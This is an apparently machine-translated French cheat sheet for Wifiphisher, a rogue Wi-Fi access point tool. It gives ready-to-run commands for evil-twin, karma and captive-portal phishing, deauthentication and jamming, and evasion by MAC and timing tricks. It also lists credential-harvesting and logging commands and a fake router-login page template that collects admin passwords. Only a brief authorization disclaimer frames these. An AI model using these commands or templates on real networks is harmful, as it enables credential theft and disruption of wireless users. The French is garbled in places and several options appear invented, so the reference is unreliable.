Wifiphisher sans fil cadre d'hameçonnage feuille de chaleur
Aperçu général
Wifiphisher est un framework voyou d'accès point pour la conduite de fiançailles d'équipes rouges ou de tests de sécurité Wi-Fi. Il crée de faux réseaux sans fil pour effectuer des attaques d'hameçonnage automatisées contre des clients sans fil, capter des identifiants et effectuer des attaques de l'homme dans le milieu.
C'est pas vrai. Attention : Cet outil est destiné aux essais de pénétration autorisés et aux évaluations de sécurité sans fil seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Kali Linux
# Install from repositories
sudo apt update
sudo apt install wifiphisher
# Install additional dependencies
sudo apt install hostapd dnsmasq
Ubuntu/Debian
# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq
# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
# Install Python dependencies
pip3 install -r requirements.txt
# Install Wifiphisher
sudo python3 setup.py install
```_
### Installation manuelle
```bash
# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev
# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install
```_
### Installation Docker
```bash
# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .
# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher
Utilisation de base
Attaque simple Rogue AP
# Basic attack with automatic target selection
sudo wifiphisher
# Attack specific network
sudo wifiphisher -t "Target_Network"
# Use specific interface
sudo wifiphisher -i wlan0
# Use custom template
sudo wifiphisher -p firmware-upgrade
Gestion des interfaces
# List available interfaces
sudo wifiphisher --list-interfaces
# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1
# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon
Référence de commande
Options de base
| Option | Description |
|---|---|
-t, --target |
Target network ESSID |
-i, --interface |
Wireless interface |
-jI, --jam-interface |
Interface for jamming |
-p, --phishing-scenario |
Phishing template |
-pK, --presharedkey |
WPA/WPA2 pre-shared key |
-qS, --quitonsuccess |
Quit on credential capture |
Options avancées
| Option | Description |
|---|---|
-aI, --apinterface |
AP interface |
-nJ, --nojamming |
Disable jamming |
-e, --essid |
Access Point ESSID |
-dE, --deauth-essid |
Deauth specific ESSID |
-dC, --deauth-channels |
Deauth channels |
-nE, --noextensions |
Disable extensions |
Options d'exploitation
| Option | Description |
|---|---|
-l, --logging |
Enable logging |
-lP, --log-path |
Log file path |
-cP, --credential-log-path |
Credential log path |
-lC, --log-credentials |
Log captured credentials |
Modèles d'hameçonnage
Modèles disponibles
# List available templates
sudo wifiphisher --list-phishing-scenarios
# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager
Modèle de mise à jour du micrologiciel
# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"
# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process
Modèle de connexion OAuth
# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"
# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service
Création de modèles personnalisés
# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│ ├── index.html
│ ├── style.css
│ └── script.js
└── static/
└── images/
Configuration du modèle (config.ini)
[info]
Name = Custom Template
Description = Custom phishing template
Language = en
[context]
# Template-specific settings
ESSID = \\\\{ESSID\\\\}
MAC = \\\\{MAC\\\\}
CHANNEL = \\\\{CHANNEL\\\\}
Attaques avancées
Mauvaise attaque Twin
# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade
# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55
# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6
Portail captif Attaque
# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect
# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login
# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect
WPA/WPA2 Capture de poignées
# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture
# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/
Attaque de Karma
# Respond to all probe requests
sudo wifiphisher --karma
# Karma with specific template
sudo wifiphisher --karma -p oauth-login
# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt
Jamming et deauthentification
Deauthentification ciblée
# Deauth specific network
sudo wifiphisher -dE "Target_Network"
# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55
# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11
Configuration de jonglage
# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1
# Disable jamming
sudo wifiphisher -nJ
# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11
Démarrage intelligent
# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming
# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5
Extensions et greffons
Extensions disponibles
# List available extensions
sudo wifiphisher --list-extensions
# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality
Moissonneur de titres de créance
# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester
# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log
Extension de capture de poignées
# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture
# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/
Extension de la zone DNS
# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler
# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf
Développement de modèles personnalisés
Structure du modèle HTML
<!DOCTYPE html>
<html>
<head>
<title>Router Configuration</title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="container">
<h1>Router Firmware Update</h1>
<p>Network: \\\\{ESSID\\\\}</p>
<form method="post" action="/login">
<input type="text" name="username" placeholder="Admin Username" required>
<input type="password" name="password" placeholder="Admin Password" required>
<button type="submit">Update Firmware</button>
</form>
</div>
<script src="script.js"></script>
</body>
</html>
CSS Style
/* style.css */
body \\\\{
font-family: Arial, sans-serif;
background: #f0f0f0;
margin: 0;
padding: 50px;
\\\\}
.container \\\\{
max-width: 400px;
margin: auto;
background: white;
padding: 30px;
border-radius: 5px;
box-shadow: 0 2px 10px rgba(0,0,0,0.1);
\\\\}
input \\\\{
width: 100%;
padding: 12px;
margin: 10px 0;
border: 1px solid #ddd;
border-radius: 3px;
\\\\}
button \\\\{
width: 100%;
background: #007cba;
color: white;
padding: 12px;
border: none;
border-radius: 3px;
cursor: pointer;
\\\\}
Fonctionnalité JavaScript
// script.js
document.addEventListener('DOMContentLoaded', function() \\\\{
// Add form validation
const form = document.querySelector('form');
form.addEventListener('submit', function(e) \\\\{
const username = document.querySelector('input[name="username"]').value;
const password = document.querySelector('input[name="password"]').value;
if (!username||!password) \\\\{
e.preventDefault();
alert('Please enter both username and password');
\\\\}
\\\\});
// Simulate loading
setTimeout(function() \\\\{
document.querySelector('.container').style.opacity = '1';
\\\\}, 500);
\\\\});
Surveillance et exploitation forestière
Surveillance en temps réel
# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l
# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v
# Monitor specific log file
tail -f /var/log/wifiphisher.log
Logistique des titres de créance
# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log
# Monitor captured credentials
tail -f /tmp/credentials.log
# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4
Analyse du trafic
# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap
# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap
# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
Techniques d'évacuation
randomisation de l'adresse MAC
# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac
# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55
# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac
Bouchonnage des canaux
# Use channel hopping
sudo wifiphisher --channel-hop
# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11
# Random channel selection
sudo wifiphisher --random-channel
Évasion du moment
# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300
# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals
# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode
Dépannage
Problèmes d'interface
# Check interface status
iwconfig
# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up
# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"
# Kill conflicting processes
sudo airmon-ng check kill
Questions relatives à la permission
# Check permissions
ls -la /usr/bin/wifiphisher
# Fix permissions
sudo chmod +x /usr/bin/wifiphisher
# Check sudo configuration
sudo visudo
Problèmes de dépendance
# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"
# Reinstall dependencies
pip3 install --upgrade -r requirements.txt
# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"
Questions relatives aux réseaux
# Check network configuration
ip addr show
# Check routing table
ip route show
# Test internet connectivity
ping -c 4 8.8.8.8
# Check DNS resolution
nslookup google.com
Considérations juridiques et éthiques
Exigences d'autorisation
# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws
Meilleures pratiques
# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines
Ressources
- [Répertoire Wifiphisher GitHub] (LINK_5)
- [Documentation Wifiphisher] (LINK_5)
- Guide des essais de sécurité sans fil
- [Essais de pénétration WiFi] (LINK_5)
- [Sécurité du réseau sans fil] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de Wifiphisher. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité sans fil. *